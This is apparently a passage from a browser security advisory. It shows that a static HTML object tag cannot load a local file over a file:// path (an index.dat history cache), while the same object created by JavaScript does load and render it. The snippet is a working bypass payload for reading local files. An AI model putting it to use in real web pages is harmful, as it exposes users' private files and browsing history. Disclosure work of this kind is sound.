/-----
<object data="file://127.0.0.1/C$/.../index.dat"
type="text/html"
width="100%" height="50"
</object>
- -----/
However the contents of the same file will be loaded and rendered if
the following HTML code is used:
/-----
<script language="Javascript">
var obj = document.createElement("object");
obj.data = "file://127.0.0.1/C$/.../index.dat";
obj.type = "text/html";
obj.id = "obj_results";
obj.width = "500px";
obj.height = "300px";
document.body.appendChild(obj);
</script>
- -----/